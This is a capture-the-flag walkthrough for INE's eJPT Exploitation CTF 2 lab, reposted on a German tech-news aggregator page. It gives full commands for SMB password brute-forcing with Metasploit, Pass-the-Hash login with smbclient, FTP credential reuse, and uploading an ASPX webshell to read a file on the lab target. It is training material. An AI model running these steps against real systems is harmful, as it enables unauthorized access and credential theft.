🪟 Windows TippsThe Gemini desktop app is now available for Windows(11.09.2026 um 17:06 Uhr)
🔧 AI Nachrichten ChatGPT automatically logged out [Fix](12.09.2026 um 17:09 Uhr)
⚠️ Malware / Trojaner / VirenWindows 11 just dropped the tool ransomware abused, Microsoft says don’t restore WMIC(10.09.2026 um 20:11 Uhr)
🪟 Windows TippsServertimeout in Outlook über 10 Minuten verlängern(12.09.2026 um 15:10 Uhr)
🔧 AI Nachrichten Stealing AI Reasoning Traces(08.09.2026 um 12:20 Uhr)
🔧 AI Nachrichten AIs as Modern Genies(08.09.2026 um 19:12 Uhr)
🪟 Windows TippsThe Gemini desktop app is now available for Windows(11.09.2026 um 17:06 Uhr)
🔧 AI Nachrichten ChatGPT automatically logged out [Fix](12.09.2026 um 17:09 Uhr)
⚠️ Malware / Trojaner / VirenWindows 11 just dropped the tool ransomware abused, Microsoft says don’t restore WMIC(10.09.2026 um 20:11 Uhr)
🪟 Windows TippsServertimeout in Outlook über 10 Minuten verlängern(12.09.2026 um 15:10 Uhr)
🔧 AI Nachrichten Stealing AI Reasoning Traces(08.09.2026 um 12:20 Uhr)
🔧 AI Nachrichten AIs as Modern Genies(08.09.2026 um 19:12 Uhr)

🕵️ Hacking 🕛 vor 2 Monaten 4 Min Lesezeit
0

Host & Network Penetration Testing: Exploitation CTF 2 — eJPT (INE)

↗ Quelle (infosecwriteups.com)
🗣️ Stimme:
📑 Inhaltsübersicht

A walkthrough covering SMB brute-forcing, Pass-the-Hash attacks, FTP credential reuse, and ASPX webshell upload to capture all four flags.

Hello everyone!

In this blog, I’ll walk through Exploitation CTF 2 from INE’s eJPT path. One Windows target, four flags — and if you read the questions carefully, each one actually unlocks the answer for the next. The lab is designed as a chain, and once you spot that pattern it flows naturally from start to finish.

So, let’s dive in.

Q. Looks like SMB user tom has not changed his password from a very long time.

As usual, I started with an Nmap scan and opened Metasploit in parallel:

nmap -T4 -sV -O -sC target.ine.local
service postgresql start && msfconsole -q -x "workspace -a win"

The scan revealed several open ports — FTP on 21, HTTP on 80, SMB on 445, and RDP on 3389. The question was pointing directly at SMB and a user called tom with a weak password, so I loaded the smb_login auxiliary module and brute-forced it against the provided wordlist:

use auxiliary/scanner/smb/smb_login
set rhosts target.ine.local
set smbuser tom
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
run

Got it. With valid credentials, I listed the available SMB shares using smbmap:

smbmap -H target.ine.local -u tom -p <password>

Tom had read access to HRDocuments. I connected and listed the contents:

smbclient //target.ine.local/HRDocuments -U tom --password <password>
smb: \> ls

Two files — flag1.txt and leaked-hashes.txt. Flag 1 captured, and the hashes file was clearly the hint for the next question.

Q. Using the NTLM hash list discovered in the previous challenge, can you compromise the SMB user nancy?

The leaked hashes file contained multiple NTLM hashes. The question pointed at user nancy, so instead of cracking the hashes I went straight to a Pass-the-Hash attack — using the hashes directly against SMB:

use auxiliary/scanner/smb/smb_login
set rhosts target.ine.local
set smbuser nancy
set pass_file leaked-hashes.txt
run

One hash matched. For SMB authentication the format is <LM_HASH>:<NT_HASH> — only the NT portion matters. I used it to connect directly with --pw-nt-hash:

smbclient //target.ine.local/ITResources -U nancy --pw-nt-hash <NT_hash>
smb: \> ls

Two files inside — flag2.txt and hint.txt. Flag 2 captured. I grabbed the hint file:

smb: \> get hint.txt

Q. I wonder what the hint found in the previous challenge could be useful for!

I opened the hint file:

cat hint.txt

It contained a set of credentials for a user called david. The Nmap scan had shown FTP open on port 21, so I tried them there:

ftp ftp://david:<password>@target.ine.local

Logged in. Listing the FTP directory showed flag3.txt sitting right there alongside the default IIS files. Flag 3 captured.

Q. Can you compromise the target machine and retrieve the C:\flag4.txt file?

Still in the FTP session — and the FTP root appeared to be the IIS web root (same iisstart.htm and iis-85.png from the default IIS page). That meant anything uploaded via FTP would be accessible directly from the web server.

I uploaded an ASPX webshell:

ftp> put /usr/share/webshells/aspx/cmdasp.aspx cmd.aspx

Then opened it in the browser:

http://target.ine.local/cmd.aspx

The webshell gave me a command input field. I ran:

type C:\flag4.txt

Flag 4 returned directly in the browser.

Final Thoughts

This CTF was well designed — each flag handed you exactly what you needed for the next one. Tom’s weak password gave the NTLM hashes. The hashes gave nancy’s access. Nancy’s share gave david’s credentials. David’s FTP session gave webshell upload, and the webshell gave the final flag.

The Pass-the-Hash step was the most interesting technically. You never need to crack an NTLM hash to use it — Windows authentication accepts the hash directly, which means a leaked hash file is often as good as a plaintext password list.

Thanks for reading!


on Medium, where people are continuing the conversation by highlighting and responding to this story.

Vollständiger Original-Bericht
Ausführliche Details, Code-Beispiele & Hersteller-Stellungnahme auf infosecwriteups.com.
↗ Original-Artikel auf infosecwriteups.com lesen
Wie bewertest du diesen Beitrag?
1 Klick Feedback
Teilen mit Netzwerk & Team:

Community-Analysen & Experten-Meinungen 0

Verfasse deine eigene Analyse, teile Workarounds oder diskutiere diesen Vorfall im Blog.
Noch keine Community-Analyse verfasst. Markiere einen Textabschnitt oder klicke oben auf Eigene Analyse verfassen“!
Community Pulse: Relevanz-Einschätzung
1 Klick Experten-Votum
🔴 Akute Relevanz 0%
🟡 In Evaluierung 0%
🟢 Keine Auswirkung 0%
Spannende Innovation 0%
Verwandte Story-Cluster & Quellen (Vektor-KI)
Port 8095 Engine
1 Quelle
The Gemini desktop app is now available for Windows
1 Quelle
ChatGPT automatically logged out [Fix]
1 Quelle
Windows 11 just dropped the tool ransomware abused, Microsoft says don’t restore WMIC
Ähnliche Beiträge
🔍 Verwandte News

Auch interessante Nachrichten Host & Network Penetration Testing: Exploitation CTF 2 — eJPT (INE)

Thematisch verwandte Begriffe: Host, Network, Penetration, Testing · 6 Treffer

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...